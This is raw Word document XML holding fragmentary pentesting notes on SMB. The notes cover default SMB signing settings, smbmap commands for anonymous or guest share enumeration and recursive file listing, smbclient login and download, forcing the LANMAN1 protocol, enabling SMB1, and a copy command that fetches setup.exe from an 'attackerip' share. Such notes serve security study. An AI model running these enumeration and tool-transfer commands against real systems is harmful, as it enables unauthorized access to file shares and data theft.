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24" w:rsidRPr="00CB4988" w:rsidRDefault="00CB4988" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB siging disabled </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4988">
        <w:t>in normal pc bydefault</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4988" w:rsidRDefault="00CB4988" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Only Domain controllers it’s enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4988" w:rsidRDefault="00CB4988" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It allows client to certify who they are so that they can pass group policy information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB4988" w:rsidRDefault="00CB4988" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4988">
        <w:t>Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4095B" w:rsidRDefault="00D4095B" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Smbmap –H &lt;IP&gt; -u &lt;blank,anonymous,guest&gt; can be tried.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4095B" w:rsidRPr="00D4095B" w:rsidRDefault="00D4095B" w:rsidP="00CB4988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To list out files use the following : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4095B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>smbmap –H &lt;IP&gt; -u &lt;username&gt; -r --depth 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4095B" w:rsidRDefault="00D4095B" w:rsidP="006C7230">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To login and download files use command : smbclient –U &lt;username&gt; //IP/sharename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756F0C" w:rsidRPr="00497E4B" w:rsidRDefault="00756F0C" w:rsidP="00756F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0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--option='client min protocol'=LANMAN1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00764DAD" w:rsidRPr="00764DAD" w:rsidRDefault="00764DAD" w:rsidP="00764DAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="012456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64DAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F9F1A5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Enable-WindowsOptionalFeature</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAD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12456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="767676"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">-Online -FeatureName </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="3A96DD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">"SMB1Protocol-Client" </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="767676"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-All</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497E4B" w:rsidRDefault="00764DAD" w:rsidP="00756F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enable SMB v1 ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00764DAD" w:rsidRDefault="00764DAD" w:rsidP="00756F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COPY “ copy </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00472C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\\attackerip\tools\setup.exe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A05C5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64DAD" w:rsidRPr="00756F0C" w:rsidRDefault="00764DAD" w:rsidP="00756F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F0C" w:rsidRDefault="00756F0C" w:rsidP="00756F0C"/>
    <w:sectPr w:rsidR="00756F0C" w:rsidSect="00EE4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16F19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E288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B4988"/>
    <w:rsid w:val="00143B24"/>
    <w:rsid w:val="00182C23"/>
    <w:rsid w:val="00232F3C"/>
    <w:rsid w:val="00497E4B"/>
    <w:rsid w:val="004B6DAB"/>
    <w:rsid w:val="006C7230"/>
    <w:rsid w:val="00756F0C"/>
    <w:rsid w:val="00764DAD"/>
    <w:rsid w:val="00A05C50"/>
    <w:rsid w:val="00C910FA"/>
    <w:rsid w:val="00CB4988"/>
    <w:rsid w:val="00D4095B"/>
    <w:rsid w:val="00EE4724"/>
    <w:rsid w:val="00F0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D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attackerip\tools\setup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2020-05-06T02:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-24T14:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>